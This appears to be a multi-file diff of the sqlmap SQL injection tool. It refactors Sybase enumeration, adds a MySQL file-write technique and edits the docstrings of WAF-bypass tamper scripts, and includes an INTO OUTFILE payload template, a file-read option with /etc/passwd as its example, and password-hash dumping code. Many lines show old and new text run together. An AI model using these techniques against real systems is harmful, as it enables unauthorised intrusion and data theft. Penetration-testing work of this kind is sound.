@@ -47,7 +46,7 @@ class Enumeration(GenericEnumeration):
blinds = (True,) blinds = (True,)
for blind in blinds: for blind in blinds:
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName)
if retVal: if retVal:
kb.data.cachedUsers = retVal[0].values()[0] kb.data.cachedUsers = retVal[0].values()[0]
@@ -94,7 +93,6 @@ class Enumeration(GenericEnumeration):
logger.info(infoMsg) logger.info(infoMsg)
rootQuery = queries[DBMS.SYBASE].dbs rootQuery = queries[DBMS.SYBASE].dbs
randStr = randomStr()
query = rootQuery.inband.query query = rootQuery.inband.query
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
@@ -103,7 +101,7 @@ class Enumeration(GenericEnumeration):
blinds = [True] blinds = [True]
for blind in blinds: for blind in blinds:
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName)
if retVal: if retVal:
kb.data.cachedDbs = retVal[0].values()[0] kb.data.cachedDbs = retVal[0].values()[0]
@@ -146,9 +144,8 @@ class Enumeration(GenericEnumeration):
for db in dbs: for db in dbs:
for blind in blinds: for blind in blinds:
randStr = randomStr()
query = rootQuery.inband.query % db query = rootQuery.inband.query % db
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName)
if retVal: if retVal:
for table in retVal[0].values()[0]: for table in retVal[0].values()[0]:
@@ -210,7 +207,7 @@ class Enumeration(GenericEnumeration):
raise SqlmapNoneDataException(errMsg) raise SqlmapNoneDataException(errMsg)
for tbl in tblList: for tbl in tblList:
tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl) tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)
if bruteForce: if bruteForce:
resumeAvailable = False resumeAvailable = False
@@ -268,7 +265,7 @@ class Enumeration(GenericEnumeration):
if dumpMode and colList: if dumpMode and colList:
table = {} table = {}
table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) table[safeSQLIdentificatorNaming(tbl, True)] = dict((_, None) for _ in colList)
kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table
continue continue
@@ -278,18 +275,17 @@ class Enumeration(GenericEnumeration):
logger.info(infoMsg) logger.info(infoMsg)
for blind in blinds: for blind in blinds:
randStr = randomStr()
query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl)) query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl))
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.usertype' % randStr], blind=blind) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.usertype' % kb.aliasName], blind=blind, alias=kb.aliasName)
if retVal: if retVal:
table = {} table = {}
columns = {} columns = {}
for name, type_ in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.usertype" % randStr])): for name, type_ in filterPairValues(zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.usertype" % kb.aliasName])):
columns[name] = SYBASE_TYPES.get(int(type_) if isinstance(type_, basestring) and type_.isdigit() else type_, type_) columns[name] = SYBASE_TYPES.get(int(type_) if isinstance(type_, basestring) and type_.isdigit() else type_, type_)
table[safeSQLIdentificatorNaming(tbl)] = columns table[safeSQLIdentificatorNaming(tbl, True)] = columns
kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table
break break

View File

@@ -46,7 +46,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] banVer = kb.bannerFp.get("dbmsVersion")
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)

View File

@@ -88,6 +88,7 @@ class Custom:
try: try:
query = raw_input("sql-shell> ") query = raw_input("sql-shell> ")
query = getUnicode(query, encoding=sys.stdin.encoding) query = getUnicode(query, encoding=sys.stdin.encoding)
query = query.strip("; ")
except KeyboardInterrupt: except KeyboardInterrupt:
print print
errMsg = "user aborted" errMsg = "user aborted"
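The added strip("; ") trims trailing semicolons and blanks from interactive sql-shell input before it is wrapped into an injection payload, e.g.:

assert "SELECT VERSION(); ".strip("; ") == "SELECT VERSION()"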

View File

@@ -261,24 +261,28 @@ class Databases:
rootQuery = queries[Backend.getIdentifiedDbms()].tables rootQuery = queries[Backend.getIdentifiedDbms()].tables
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
-            query = rootQuery.inband.query
-            condition = rootQuery.inband.condition if 'condition' in rootQuery.inband else None
-
-            if condition:
-                if not Backend.isDbms(DBMS.SQLITE):
-                    query += " WHERE %s" % condition
-
-                if conf.excludeSysDbs:
-                    infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList))
-                    logger.info(infoMsg)
-                    query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList)
-                else:
-                    query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs))
-
-                if len(dbs) < 2 and ("%s," % condition) in query:
-                    query = query.replace("%s," % condition, "", 1)
-
-            values = inject.getValue(query, blind=False, time=False)
+            values = []
+
+            for query, condition in ((rootQuery.inband.query, getattr(rootQuery.inband, "condition", None)), (getattr(rootQuery.inband, "query2", None), getattr(rootQuery.inband, "condition2", None))):
+                if not isNoneValue(values) or not query:
+                    break
+
+                if condition:
+                    if not Backend.isDbms(DBMS.SQLITE):
+                        query += " WHERE %s" % condition
+
+                    if conf.excludeSysDbs:
+                        infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList))
+                        logger.info(infoMsg)
+                        query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList)
+                    else:
+                        query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs))
+
+                    if len(dbs) < 2 and ("%s," % condition) in query:
+                        query = query.replace("%s," % condition, "", 1)
+
+                if query:
+                    values = inject.getValue(query, blind=False, time=False)

             if not isNoneValue(values):
                 values = filter(None, arrayizeValue(values))
@@ -601,6 +605,8 @@ class Databases:
if values is None: if values is None:
values = inject.getValue(query, blind=False, time=False) values = inject.getValue(query, blind=False, time=False)
if values and isinstance(values[0], basestring):
values = [values]
if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):
index, values = 1, [] index, values = 1, []
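The rewritten block above introduces a primary/secondary query pair (query and query2/condition2, where defined for the DBMS) and only runs the fallback when the first attempt returns nothing. Reduced to its core control flow (names below are placeholders, not sqlmap's):

def get_values(primary_query, fallback_query, run_query):
    values = None
    for query in (primary_query, fallback_query):
        if values or not query:     # stop once something came back or there is no fallback
            break
        values = run_query(query)
    return values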

View File

@@ -129,10 +129,7 @@ class Entries:
else: else:
kb.dumpTable = "%s.%s" % (conf.db, tbl) kb.dumpTable = "%s.%s" % (conf.db, tbl)
-            if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \
-                    or safeSQLIdentificatorNaming(tbl, True) not in \
-                    kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] \
-                    or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]:
+            if safeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns or safeSQLIdentificatorNaming(tbl, True) not in kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]:
warnMsg = "unable to enumerate the columns for table " warnMsg = "unable to enumerate the columns for table "
warnMsg += "'%s' in database" % unsafeSQLIdentificatorNaming(tbl) warnMsg += "'%s' in database" % unsafeSQLIdentificatorNaming(tbl)
warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(conf.db) warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(conf.db)

View File

@@ -284,17 +284,23 @@ class Filesystem:
if conf.direct or isStackingAvailable(): if conf.direct or isStackingAvailable():
if isStackingAvailable(): if isStackingAvailable():
debugMsg = "going to upload the file '%s' with " % fileType debugMsg = "going to upload the file '%s' with " % fileType
debugMsg += "stacked query SQL injection technique" debugMsg += "stacked query technique"
logger.debug(debugMsg) logger.debug(debugMsg)
written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck) written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck)
self.cleanup(onlyFileTbl=True) self.cleanup(onlyFileTbl=True)
elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL): elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to upload the file '%s' with " % fileType debugMsg = "going to upload the file '%s' with " % fileType
debugMsg += "UNION query SQL injection technique" debugMsg += "UNION query technique"
logger.debug(debugMsg) logger.debug(debugMsg)
written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck) written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck)
elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to upload the file '%s' with " % fileType
debugMsg += "LINES TERMINATED BY technique"
logger.debug(debugMsg)
written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck)
else: else:
errMsg = "none of the SQL injection techniques detected can " errMsg = "none of the SQL injection techniques detected can "
errMsg += "be used to write files to the underlying file " errMsg += "be used to write files to the underlying file "

View File

@@ -125,8 +125,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
raise SqlmapMissingPrivileges(errMsg) raise SqlmapMissingPrivileges(errMsg)
try: try:
-            from impacket import ImpactDecoder
-            from impacket import ImpactPacket
+            __import__("impacket")
except ImportError: except ImportError:
errMsg = "sqlmap requires 'python-impacket' third-party library " errMsg = "sqlmap requires 'python-impacket' third-party library "
errMsg += "in order to run icmpsh master. You can get it at " errMsg += "in order to run icmpsh master. You can get it at "
@@ -372,7 +371,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
else: else:
regVal = conf.regVal regVal = conf.regVal
infoMsg = "reading Windows registry path '%s\%s' " % (regKey, regVal) infoMsg = "reading Windows registry path '%s\\%s' " % (regKey, regVal)
logger.info(infoMsg) logger.info(infoMsg)
return self.readRegKey(regKey, regVal, True) return self.readRegKey(regKey, regVal, True)
@@ -417,7 +416,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
else: else:
regType = conf.regType regType = conf.regType
infoMsg = "adding Windows registry path '%s\%s' " % (regKey, regVal) infoMsg = "adding Windows registry path '%s\\%s' " % (regKey, regVal)
infoMsg += "with data '%s'. " % regData infoMsg += "with data '%s'. " % regData
infoMsg += "This will work only if the user running the database " infoMsg += "This will work only if the user running the database "
infoMsg += "process has privileges to modify the Windows registry." infoMsg += "process has privileges to modify the Windows registry."
@@ -449,12 +448,12 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
regVal = conf.regVal regVal = conf.regVal
message = "are you sure that you want to delete the Windows " message = "are you sure that you want to delete the Windows "
message += "registry path '%s\%s? [y/N] " % (regKey, regVal) message += "registry path '%s\\%s? [y/N] " % (regKey, regVal)
if not readInput(message, default='N', boolean=True): if not readInput(message, default='N', boolean=True):
return return
infoMsg = "deleting Windows registry path '%s\%s'. " % (regKey, regVal) infoMsg = "deleting Windows registry path '%s\\%s'. " % (regKey, regVal)
infoMsg += "This will work only if the user running the database " infoMsg += "This will work only if the user running the database "
infoMsg += "process has privileges to modify the Windows registry." infoMsg += "process has privileges to modify the Windows registry."
logger.info(infoMsg) logger.info(infoMsg)

View File

@@ -187,13 +187,12 @@ class Users:
query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users))
if Backend.isDbms(DBMS.SYBASE): if Backend.isDbms(DBMS.SYBASE):
randStr = randomStr()
getCurrentThreadData().disableStdOut = True getCurrentThreadData().disableStdOut = True
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=False) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False)
if retVal: if retVal:
for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): for user, password in filterPairValues(zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])):
if user not in kb.data.cachedUsersPasswords: if user not in kb.data.cachedUsersPasswords:
kb.data.cachedUsersPasswords[user] = [password] kb.data.cachedUsersPasswords[user] = [password]
else: else:
@@ -228,13 +227,12 @@ class Users:
if Backend.isDbms(DBMS.SYBASE): if Backend.isDbms(DBMS.SYBASE):
getCurrentThreadData().disableStdOut = True getCurrentThreadData().disableStdOut = True
randStr = randomStr()
query = rootQuery.inband.query query = rootQuery.inband.query
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=True) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=True)
if retVal: if retVal:
for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): for user, password in filterPairValues(zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])):
password = "0x%s" % hexencode(password, conf.encoding).upper() password = "0x%s" % hexencode(password, conf.encoding).upper()
if user not in kb.data.cachedUsersPasswords: if user not in kb.data.cachedUsersPasswords:

View File

@@ -1 +1 @@
LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- -

View File

@@ -579,15 +579,15 @@ shLib =
# Read a specific file from the back-end DBMS underlying file system. # Read a specific file from the back-end DBMS underlying file system.
# Examples: /etc/passwd or C:\boot.ini # Examples: /etc/passwd or C:\boot.ini
rFile = fileRead =
# Write a local file to a specific path on the back-end DBMS underlying # Write a local file to a specific path on the back-end DBMS underlying
# file system. # file system.
# Example: /tmp/sqlmap.txt or C:\WINNT\Temp\sqlmap.txt # Example: /tmp/sqlmap.txt or C:\WINNT\Temp\sqlmap.txt
wFile = fileWrite =
# Back-end DBMS absolute filepath to write the file to. # Back-end DBMS absolute filepath to write the file to.
dFile = fileDest =
# These options can be used to access the back-end database management # These options can be used to access the back-end database management
@@ -778,6 +778,10 @@ googlePage = 1
# Valid: True or False # Valid: True or False
identifyWaf = False identifyWaf = False
# Display list of available tamper scripts
# Valid: True or False
listTampers = False
# Imitate smartphone through HTTP User-Agent header. # Imitate smartphone through HTTP User-Agent header.
# Valid: True or False # Valid: True or False
mobile = False mobile = False

View File

@@ -5,37 +5,37 @@ Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
-import sys
-
-sys.dont_write_bytecode = True
-
 try:
-    __import__("lib.utils.versioncheck")  # this has to be the first non-standard import
-except ImportError:
-    exit("[!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details")
-
-import bdb
-import distutils
-import glob
-import inspect
-import json
-import logging
-import os
-import re
-import shutil
-import sys
-import thread
-import threading
-import time
-import traceback
-import warnings
-
-warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning)
-warnings.filterwarnings(action="ignore", category=DeprecationWarning)
-
-from lib.core.data import logger
-
-try:
+    import sys
+
+    sys.dont_write_bytecode = True
+
+    try:
+        __import__("lib.utils.versioncheck")  # this has to be the first non-standard import
+    except ImportError:
+        exit("[!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details")
+
+    import bdb
+    import distutils
+    import glob
+    import inspect
+    import json
+    import logging
+    import os
+    import re
+    import shutil
+    import sys
+    import thread
+    import threading
+    import time
+    import traceback
+    import warnings
+
+    warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning)
+    warnings.filterwarnings(action="ignore", category=DeprecationWarning)
+
+    from lib.core.data import logger
+
     from lib.core.common import banner
     from lib.core.common import checkIntegrity
     from lib.core.common import createGithubIssue

@@ -67,9 +67,13 @@ try:
     from lib.parse.cmdline import cmdLineParser
 except KeyboardInterrupt:
     errMsg = "user aborted"
-    logger.error(errMsg)
-    raise SystemExit
+
+    if "logger" in globals():
+        logger.error(errMsg)
+        raise SystemExit
+    else:
+        import time
+        exit("\r[%s] [ERROR] %s" % (time.strftime("%X"), errMsg))
def modulePath(): def modulePath():
""" """
@@ -273,6 +277,12 @@ def main():
logger.error(errMsg) logger.error(errMsg)
raise SystemExit raise SystemExit
elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")):
errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) "
errMsg += "(Reference: https://github.com/PyMySQL/PyMySQL/issues/700)"
logger.error(errMsg)
raise SystemExit
elif "must be pinned buffer, not bytearray" in excMsg: elif "must be pinned buffer, not bytearray" in excMsg:
errMsg = "error occurred at Python interpreter which " errMsg = "error occurred at Python interpreter which "
errMsg += "is fixed in 2.7.x. Please update accordingly " errMsg += "is fixed in 2.7.x. Please update accordingly "
@@ -325,7 +335,11 @@ def main():
file_ = match.group(1) file_ = match.group(1)
file_ = os.path.relpath(file_, os.path.dirname(__file__)) file_ = os.path.relpath(file_, os.path.dirname(__file__))
file_ = file_.replace("\\", '/') file_ = file_.replace("\\", '/')
-                file_ = re.sub(r"\.\./", '/', file_).lstrip('/')
+                if "../" in file_:
+                    file_ = re.sub(r"(\.\./)+", '/', file_)
+                else:
+                    file_ = file_.lstrip('/')
+                file_ = re.sub(r"/{2,}", '/', file_)
excMsg = excMsg.replace(match.group(1), file_) excMsg = excMsg.replace(match.group(1), file_)
errMsg = maskSensitiveData(errMsg) errMsg = maskSensitiveData(errMsg)
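Small worked example of the traceback-path normalization added above: any leading chain of '../' segments collapses to a single '/', and duplicate slashes are squeezed afterwards (the path itself is illustrative):

import re

path = "../../lib/core/common.py"
path = re.sub(r"(\.\./)+", '/', path) if "../" in path else path.lstrip('/')
path = re.sub(r"/{2,}", '/', path)
assert path == "/lib/core/common.py"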

View File

@@ -40,8 +40,8 @@ def main():
# Parse command line options # Parse command line options
apiparser = optparse.OptionParser() apiparser = optparse.OptionParser()
apiparser.add_option("-s", "--server", help="Act as a REST-JSON API server", default=RESTAPI_DEFAULT_PORT, action="store_true") apiparser.add_option("-s", "--server", help="Run as a REST-JSON API server", default=RESTAPI_DEFAULT_PORT, action="store_true")
apiparser.add_option("-c", "--client", help="Act as a REST-JSON API client", default=RESTAPI_DEFAULT_PORT, action="store_true") apiparser.add_option("-c", "--client", help="Run as a REST-JSON API client", default=RESTAPI_DEFAULT_PORT, action="store_true")
apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS, action="store") apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS, action="store")
apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type="int", action="store") apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type="int", action="store")
apiparser.add_option("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER, action="store") apiparser.add_option("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER, action="store")

View File

@@ -18,6 +18,9 @@ def tamper(payload, **kwargs):
""" """
Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),...) counterpart Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),...) counterpart
Requirement:
* MySQL
Tested against: Tested against:
* MySQL 4, 5.0 and 5.5 * MySQL 4, 5.0 and 5.5

View File

@@ -14,7 +14,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces apostrophe character with its UTF-8 full width counterpart Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)
References: References:
* http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128

View File

@@ -14,7 +14,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces apostrophe character with its illegal double unicode counterpart Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27)
>>> tamper("1 AND '1'='1") >>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271' '1 AND %00%271%00%27=%00%271'

View File

@@ -18,7 +18,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Appends encoded NULL byte character at the end of payload Appends (Access) NULL byte character (%00) at the end of payload
Requirement: Requirement:
* Microsoft Access * Microsoft Access

View File

@@ -17,7 +17,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Base64 all characters in a given payload Base64-encodes all characters in a given payload
>>> tamper("1' AND SLEEP(5)#") >>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw==' 'MScgQU5EIFNMRUVQKDUpIw=='

View File

@@ -16,8 +16,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
-    Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
-    Replaces equals operator ('=') with 'BETWEEN # AND #'
+    Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'
Tested against: Tested against:
* Microsoft SQL Server 2005 * Microsoft SQL Server 2005
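Illustrative re-implementation of the idea behind this tamper (not the shipped script, just the operator rewrite in miniature):

import re

def between_like(payload):
    # '>' comparisons become NOT BETWEEN, '=' comparisons become BETWEEN
    payload = re.sub(r"\s*>\s*(\d+)", r" NOT BETWEEN 0 AND \1", payload)
    payload = re.sub(r"\s*=\s*(\d+)", r" BETWEEN \1 AND \1", payload)
    return payload

# between_like("1 AND A > 5") -> "1 AND A NOT BETWEEN 0 AND 5"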

View File

@@ -17,8 +17,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
-    Replaces space character after SQL statement with a valid random blank character.
-    Afterwards replace character '=' with operator LIKE
+    Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE
Requirement: Requirement:
* Blue Coat SGOS with WAF activated as documented in * Blue Coat SGOS with WAF activated as documented in

View File

@@ -16,13 +16,10 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
-    Double url-encodes all characters in a given payload (not processing
-    already encoded)
+    Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)

     Notes:
-        * Useful to bypass some weak web application firewalls that do not
-          double url-decode the request before processing it through their
-          ruleset
+        * Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset
>>> tamper('SELECT FIELD FROM%20TABLE') >>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'

View File

@@ -16,8 +16,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
-    Url-encodes all characters in a given payload (not processing already
-    encoded)
+    URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54)
Tested against: Tested against:
* Microsoft SQL Server 2005 * Microsoft SQL Server 2005
@@ -26,10 +25,8 @@ def tamper(payload, **kwargs):
* PostgreSQL 8.3, 8.4, 9.0 * PostgreSQL 8.3, 8.4, 9.0
Notes: Notes:
-        * Useful to bypass very weak web application firewalls that do not
-          url-decode the request before processing it through their ruleset
-        * The web server will anyway pass the url-decoded version behind,
-          hence it should work against any DBMS
+        * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
+        * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS
>>> tamper('SELECT FIELD FROM%20TABLE') >>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

View File

@@ -18,8 +18,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
-    Unicode-url-encodes non-encoded characters in a given payload (not
-    processing already encoded)
+    Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054)
Requirement: Requirement:
* ASP * ASP
@@ -32,9 +31,7 @@ def tamper(payload, **kwargs):
* PostgreSQL 9.0.3 * PostgreSQL 9.0.3
Notes: Notes:
-        * Useful to bypass weak web application firewalls that do not
-          unicode url-decode the request before processing it through their
-          ruleset
+        * Useful to bypass weak web application firewalls that do not unicode URL-decode the request before processing it through their ruleset
>>> tamper('SELECT FIELD%20FROM TABLE') >>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'

View File

@@ -13,8 +13,7 @@ __priority__ = PRIORITY.NORMAL
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
-    Unicode-escapes non-encoded characters in a given payload (not
-    processing already encoded)
+    Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054)
Notes: Notes:
* Useful to bypass weak filtering and/or WAFs in JSON contexes * Useful to bypass weak filtering and/or WAFs in JSON contexes

View File

@@ -19,7 +19,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart
Requirement: Requirement:
* MySQL * MySQL

View File

@@ -19,7 +19,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart
Requirement: Requirement:
* MySQL * MySQL

View File

@@ -16,7 +16,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Prepends (inline) comment before parentheses Prepends (inline) comment before parentheses (e.g. ( -> /**/()
Tested against: Tested against:
* Microsoft SQL Server * Microsoft SQL Server

View File

@@ -18,7 +18,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
